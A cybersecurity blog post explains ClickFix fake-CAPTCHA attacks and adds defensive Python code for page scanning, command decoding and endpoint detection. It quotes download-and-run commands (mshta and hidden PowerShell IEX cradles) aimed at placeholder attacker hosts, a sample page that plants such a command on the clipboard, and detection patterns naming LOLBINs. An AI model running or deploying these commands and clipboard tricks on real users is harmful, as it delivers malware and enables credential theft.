ClickFix Fake CAPTCHA Attacks: How Cybercriminals Exploit User Trust to Deliver Malware
- Akshay Jain
- Apr 15
- 4 min read
Not every CAPTCHA is a guardian; some are gateways for malware.
In the ever-evolving landscape of cyber threats, attackers continually devise new ways to exploit user trust. One such tactic is the ClickFix fake CAPTCHA attack, a social engineering technique that tricks users into running malicious code themselves under the guise of a routine verification step. Because the victim, not the browser, launches the command, the attack sidesteps download warnings, SmartScreen prompts and browser exploit mitigations entirely.
Understanding ClickFix Fake CAPTCHA Attacks
What is ClickFix?
ClickFix is a social engineering technique that manipulates users into running attacker-supplied commands by presenting them with fake error messages (the name comes from the fake error dialogs that offer a “Fix” or “How to fix” button) or fake verification prompts. These prompts mimic legitimate system dialogs or security checks, such as CAPTCHAs, to borrow their credibility.
The Role of Fake CAPTCHAs
In this variant, attackers build counterfeit CAPTCHA challenges that imitate trusted services such as Google reCAPTCHA. After the user interacts with the widget, they are told to perform a “verification step” such as pressing Windows (⊞) + R and pasting a command that the page has already placed on the clipboard. The command runs with the user’s own privileges and entirely outside the browser sandbox, so no download prompt or browser-side control ever comes into play.

Technical Breakdown of the Attack
Initial Access - Website Compromise or Malicious Ad Injection
The attacker compromises a legitimate website or leverages malvertising to inject JavaScript based redirectors.
This script fingerprints the visitor (OS, browser, language, geolocation) so that only likely real Windows users are redirected, while bots, security crawlers and sandboxes see a harmless page.
Once a target is deemed viable, the script redirects the user to a fake CAPTCHA page, often hosted on a domain designed to resemble a legitimate service (secure-check[.]live, browser-defense[.]com, etc.).
Deceptive Page Load - Fake CAPTCHA Interface
The attacker displays a visually convincing CAPTCHA widget, resembling services like Google reCAPTCHA.
Behind the scenes there is no CAPTCHA functionality at all; it is static HTML/CSS/JS that reproduces the look of the widget to gain trust, and it never loads the real provider’s script.
Once the user clicks the checkbox or interacts with the CAPTCHA, it triggers another stage of social engineering.
Social Engineering Execution - Clipboard Manipulation
Immediately after the user “completes” the CAPTCHA, the page’s JavaScript calls navigator.clipboard.writeText() (older variants use document.execCommand('copy')). Browsers allow a page to write to the clipboard during a user gesture such as a click without showing any permission prompt, and the click on the fake checkbox supplies exactly that gesture.
This silently replaces the clipboard contents with a PowerShell or mshta command; the user sees nothing change.
Simultaneously, the page displays fake error messages or verification failures prompting the user:
"To verify you are human, press Windows + R, then press Ctrl + V and hit Enter."
Users, tricked by the authoritative-looking CAPTCHA and message, proceed to do exactly that.
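The combination described in the steps above (a script-driven clipboard write plus on-page instructions to open the Run dialog and paste) is itself a usable indicator. The following scanner is an added example, not code from the original post: it scores the text of a fetched page for that combination and for the LOLBIN strings and reCAPTCHA look-alike markers that accompany it. The three sample pages are constructed for illustration, and example.invalid is a reserved name that never resolves.

```python
"""Static triage of a fetched page for ClickFix / fake-CAPTCHA indicators.

Added example, not code from the original post. The sample pages are
constructed for illustration and are not captured from any real campaign.
"""
import re

# Script-side clipboard writes: the modern API and the legacy execCommand path.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|document\.execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
# Instruction text telling the victim to open the Run dialog (Win + R / ⊞ + R).
RUN_DIALOG = re.compile(r"(?:\bwin(?:dows)?\s*(?:key)?|⊞)\s*\+\s*r\b", re.I)
PASTE = re.compile(r"\bctrl\s*\+\s*v\b", re.I)
# LOLBIN names and download-cradle keywords present in the page or its script.
LOLBIN = re.compile(
    r"\b(?:mshta|powershell|pwsh|cmd|curl)(?:\.exe)?\b|\biex\b|downloadstring|"
    r"invoke-expression|frombase64string", re.I)
# A fake widget borrows the reCAPTCHA look but never loads Google's real script.
RECAPTCHA_LOOK = re.compile(r"recaptcha|I(?:'|&#39;|’)m not a robot", re.I)
RECAPTCHA_REAL = re.compile(
    r"https://www\.(?:google\.com|recaptcha\.net)/recaptcha/api\.js", re.I)


def score_page(html: str) -> dict:
    """Return the indicators found in one page body and a verdict."""
    found = {
        "clipboard_write": bool(CLIPBOARD_WRITE.search(html)),
        "run_dialog_instruction": bool(RUN_DIALOG.search(html)),
        "paste_instruction": bool(PASTE.search(html)),
        "lolbin_string": bool(LOLBIN.search(html)),
        "captcha_lookalike": bool(RECAPTCHA_LOOK.search(html)) and not RECAPTCHA_REAL.search(html),
    }
    hits = [name for name, present in found.items() if present]
    # The decisive pair is a script clipboard write together with a Run-dialog
    # instruction; each alone is common on benign pages (copy buttons, shortcut docs).
    if found["clipboard_write"] and found["run_dialog_instruction"]:
        verdict = "clickfix"
    elif len(hits) >= 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits}


# --- constructed samples (example.invalid is a reserved, non-resolving name) ---
FAKE_CAPTCHA_PAGE = """
<div class="rc-anchor"><input type="checkbox" id="cb"> I'm not a robot</div>
<p id="steps"></p>
<script>
var cmd = "mshta http://example.invalid/verify.hta";
document.getElementById('cb').addEventListener('click', function () {
  navigator.clipboard.writeText(cmd);   // the copy happens inside the click gesture
  document.getElementById('steps').innerText =
    'Verification Steps: 1. Press Windows + R  2. Press Ctrl + V  3. Press Enter';
});
</script>
"""

DOCS_COPY_BUTTON_PAGE = """
<pre id="code">pip install requests</pre>
<button onclick="navigator.clipboard.writeText(document.getElementById('code').innerText)">Copy</button>
<p>Then use Ctrl + V to paste the command into your terminal.</p>
"""

SHORTCUT_HELP_PAGE = """
<h2>Opening PowerShell quickly</h2>
<p>Press Windows + R, type powershell and press Enter.</p>
"""

if __name__ == "__main__":
    for name, page in [("fake_captcha", FAKE_CAPTCHA_PAGE),
                       ("docs_copy_button", DOCS_COPY_BUTTON_PAGE),
                       ("shortcut_help", SHORTCUT_HELP_PAGE)]:
        print(name, score_page(page))
```

The two benign samples matter as much as the malicious one: a documentation page with a copy button and a help article about Win+R each trip one or two indicators on their own, which is why the verdict keys on the pair rather than on any single string. A proxy or sandbox that fetches the final landing page can apply the same logic before the user ever sees the widget.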
Malicious Execution – Living Off The Land Binary Abuse
The clipboard contains a command such as:
mshta.exe http://malicious-domain[.]xyz/payload.hta
Or a PowerShell download cradle that hides its window and runs whatever the server returns:
powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://badactor[.]site/script.ps1')"
What's happening here:
mshta.exe (Microsoft HTML Application Host) is a signed Windows binary, a Living Off The Land Binary (LOLBIN), that fetches and runs a remote HTML Application (HTA) file; the script inside runs as an ordinary process with the user's full privileges, not inside any browser sandbox.
The HTA file usually contains VBScript or JScript that:
Downloads and runs a secondary payload (EXE or DLL)
Installs info-stealers such as Lumma or RedLine, keyloggers, or RATs such as AsyncRAT.
Establishes persistence (e.g., via registry run keys, scheduled tasks).
Post-Exploitation – Malware Activities
Once the malware is in, the threat actor can:
Exfiltrate browser-stored credentials, session cookies, and saved autofill data.
Harvest system info, like OS, CPU, installed software, etc.
Establish persistence through startup folders, registry keys, or scheduled tasks.
Use C2 (Command and Control) to download additional payloads or turn the device into a bot in a larger botnet.
Real-World Case Studies
Case Study 1: ClearFake Campaign
In May 2024, the ClearFake threat group compromised over 9,300 websites, injecting them with malicious code that displayed fake CAPTCHA prompts. Users who followed the provided instructions inadvertently installed malware like Lumma Stealer and Vidar Stealer.
Case Study 2: GitHub Phishing Incident
In September 2024, attackers targeted GitHub users by creating fake issues that claimed vulnerabilities in their code. These issues redirected users to fake CAPTCHA pages, leading to the installation of Lumma Stealer upon execution of the provided commands.
Evasion and Infrastructure Techniques
Threat actors rotate domains and infrastructure frequently, often using bulletproof hosting providers.
They obfuscate HTA and PowerShell scripts with Base64 encoding (for example PowerShell's -EncodedCommand), string concatenation, and variable trickery to evade detection.
In some campaigns, the fake CAPTCHA itself is hosted via legitimate services like GitHub Pages or Netlify, adding legitimacy to the URL.
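The obfuscation layers listed above are shallow and can be undone mechanically before the command reaches a ticket or a blocklist. The following decoder is an added example, not code from the original post: it strips cmd.exe caret escapes, expands a PowerShell -EncodedCommand argument (Base64 of UTF-16LE), collapses quoted string concatenation, and then extracts the LOLBIN, the payload URL and the hidden-window and download-cradle markers from the commands shown earlier in the article. All sample commands are constructed, and example.invalid is a reserved name that never resolves.

```python
"""Normalise and decode the command a ClickFix page places on the clipboard.

Added example, not from the original post. Sample commands are constructed.
"""
import base64
import re

LOLBIN_RE = re.compile(
    r"\b(mshta|powershell|pwsh|cmd|curl|certutil|bitsadmin|msiexec|rundll32)(?:\.exe)?\b", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|"
    r"start-bitstransfer|frombase64string", re.I)
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)        # -w / -win / -WindowStyle hidden
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def decode_encoded_command(cmd: str) -> str:
    """Replace a -EncodedCommand <base64> argument with the UTF-16LE script it hides."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return cmd
    try:
        script = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd          # not valid Base64/UTF-16: leave the command untouched
    return cmd[:m.start()] + script + cmd[m.end():]


def analyse_clipboard_command(cmd: str) -> dict:
    """Peel the obfuscation layers and extract the indicators from one clipboard command."""
    norm = cmd.replace("^", "")                           # cmd.exe caret escapes
    norm = decode_encoded_command(norm)
    norm = re.sub(r"['\"]\s*\+\s*['\"]", "", norm)        # 'htt'+'p://x' -> 'http://x'
    return {
        "lolbins": sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(norm)}),
        "urls": URL_RE.findall(norm),
        "hidden_window": bool(HIDDEN_RE.search(norm)),
        "download_cradle": bool(CRADLE_RE.search(norm)),
        "normalised": norm,
    }


def _b64_utf16(script: str) -> str:
    """Encode a script the way 'powershell -enc' expects (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLES = {
    "plain_mshta": "mshta.exe http://example.invalid/payload.hta",
    "hidden_iex": 'powershell -w hidden -c "IEX (New-Object Net.WebClient)'
                  '.DownloadString(\'http://example.invalid/script.ps1\')"',
    "encoded": "powershell -nop -w hidden -enc "
               + _b64_utf16("iex (iwr 'http://example.invalid/s.ps1').Content"),
    "concat": 'powershell -c "IEX (New-Object Net.WebClient)'
              '.DownloadString(\'htt\'+\'p://example.invalid/a.ps1\')"',
    "caret": "cmd /c m^shta ht^tp://example.invalid/x.hta",
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        result = analyse_clipboard_command(sample)
        print(f"{name}: lolbins={result['lolbins']} urls={result['urls']} "
              f"hidden={result['hidden_window']} cradle={result['download_cradle']}")
```

Without the concatenation step the "concat" sample yields no URL at all, which is exactly why the string is split in the wild; and the -EncodedCommand regex deliberately does not fire on -ep bypass or -exec, so ordinary execution-policy flags are not mistaken for an encoded payload.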
Mitigation Strategies
User Education: Inform users about the dangers of executing unsolicited commands and the existence of fake CAPTCHA attacks.
Technical Controls:
Endpoint Protection: Deploy EDR with process-lineage rules that flag explorer.exe (the parent of anything launched from the Run dialog) spawning mshta.exe, powershell.exe or other LOLBINs with a URL, download cradle or hidden-window flag on the command line. Where users do not need them, block mshta.exe with AppLocker or WDAC, enable the Attack Surface Reduction rule that blocks JavaScript/VBScript from launching downloaded executable content, and consider the “Remove Run menu from Start Menu” policy (NoRun), which also disables Win+R.
Network Monitoring: Alert on outbound HTTP(S) from mshta.exe, powershell.exe and similar binaries, especially to newly registered or low-reputation domains; mshta.exe has almost no legitimate reason to reach the internet, so its first external connection is worth a look on its own.
Email and Web Filtering: Block known malicious and newly registered domains and keep phishing emails from reaching users, but note that the lure page is often on a compromised legitimate site or on GitHub Pages or Netlify, so domain reputation alone will not catch every case.
Incident Response: The Run dialog records what was typed or pasted into it under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so the pasted command usually survives in the user’s registry hive and quickly confirms a ClickFix execution.
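The endpoint and network controls above reduce to a handful of rules over telemetry most environments already collect. The following detection logic is an added example, not code from the original post or any vendor product: it runs over constructed, Sysmon-shaped records (Event ID 1 process creation with Image, ParentImage and CommandLine; Event ID 3 network connection with Image, DestinationIp and DestinationPort) and over a constructed copy of the RunMRU key, where Windows keeps the commands entered into Win+R. The events and registry values are made up for illustration, example.invalid never resolves, and the 203.0.113.0/24 documentation range stands in for a public address.

```python
"""Endpoint-side detection for the execution stage of ClickFix.

Added example, not from the original post. Sample events and registry values are
constructed, not real telemetry. Three checks:
  1. Sysmon ID 1: a LOLBIN launched with a URL/cradle/hidden-window command line,
     rated high when the parent is explorer.exe (i.e. it came from the Run dialog);
  2. Sysmon ID 3: a LOLBIN connecting outside the internal ranges;
  3. RunMRU (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU),
     which records what was typed or pasted into Win+R.
"""
import ipaddress
import re

RUN_DIALOG_PARENT = "explorer.exe"
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe", "certutil.exe",
           "bitsadmin.exe", "msiexec.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
SUSPICIOUS_CMDLINE = re.compile(
    r"https?://|downloadstring|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|"
    r"frombase64string|-w[a-z]*\s+hidden|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(ev: dict):
    """Sysmon ID 1: LOLBIN with a suspicious command line, worst when spawned by explorer.exe."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in LOLBINS:
        return None
    if not SUSPICIOUS_CMDLINE.search(ev["CommandLine"]):
        return None     # explorer.exe -> powershell.exe with a plain command line is everyday use
    from_run_dialog = basename(ev["ParentImage"]) == RUN_DIALOG_PARENT
    return {
        "rule": "lolbin_from_run_dialog" if from_run_dialog else "lolbin_download_cradle",
        "severity": "high" if from_run_dialog else "medium",
        "image": basename(ev["Image"]),
        "detail": ev["CommandLine"],
    }


def check_network(ev: dict):
    """Sysmon ID 3: LOLBIN connecting outside the internal ranges."""
    if ev["EventID"] != 3 or basename(ev["Image"]) not in LOLBINS:
        return None
    dst = ipaddress.ip_address(ev["DestinationIp"])
    if any(dst in net for net in INTERNAL_NETS):
        return None
    image = basename(ev["Image"])
    return {
        "rule": "lolbin_network",
        "severity": "high" if image in SCRIPT_HOSTS else "low",   # mshta.exe has no business online
        "image": image,
        "detail": f"{ev['DestinationIp']}:{ev['DestinationPort']}",
    }


def triage_runmru(values: dict) -> list:
    """values: {value name: data} read from RunMRU. Each entry ends in '\\1' and
    MRUList orders the single-letter value names, most recent first."""
    hits = []
    for name in values.get("MRUList", ""):
        raw = values.get(name, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if SUSPICIOUS_CMDLINE.search(cmd):
            hits.append(cmd)
    return hits


def run_detections(events: list, runmru: dict) -> list:
    alerts = [a for ev in events for a in (check_process_create(ev), check_network(ev)) if a]
    alerts += [{"rule": "runmru_artifact", "severity": "high", "image": "explorer.exe", "detail": c}
               for c in triage_runmru(runmru)]
    return alerts


# --- constructed samples ---
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.invalid/payload.hta"},                    # Win+R paste: high
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},                                                  # user opened a shell: nothing
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/s.ps1')\""},               # cradle, other parent: medium
    {"EventID": 3, "Image": r"C:\Windows\System32\mshta.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    {"EventID": 3, "Image": PS, "DestinationIp": "10.0.0.5", "DestinationPort": 5985},  # internal WinRM: nothing
]
RUNMRU = {"MRUList": "ba", "a": "notepad\\1", "b": "mshta http://example.invalid/payload.hta\\1"}

if __name__ == "__main__":
    for alert in run_detections(EVENTS, RUNMRU):
        print(f"[{alert['severity']}] {alert['rule']}: {alert['image']} {alert['detail']}")
```

The second sample event is the one that keeps this usable: explorer.exe launching powershell.exe is how every user opens a shell, so the rule keys on the command line first and uses the parent only to raise severity. The RunMRU check is for after the fact; it needs the user's NTUSER.DAT or a live registry read, not Sysmon, and is the quickest way to recover the exact command that was pasted.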
The ClickFix fake CAPTCHA attack exemplifies the evolving nature of social engineering threats. By exploiting user trust in familiar verification processes, attackers can deliver malware with alarming efficiency. Awareness, education, and robust security measures are crucial in defending against such deceptive tactics.
Happy cyber-exploration! 🚀🔒
Note: Feel free to drop your thoughts in the comments below - whether it's feedback, a topic you'd love to see covered, or just to say hi! Don’t forget to join the forum for more engaging discussions and stay updated with the latest blog posts. Let’s keep the conversation going and make cybersecurity a community effort!
-AJ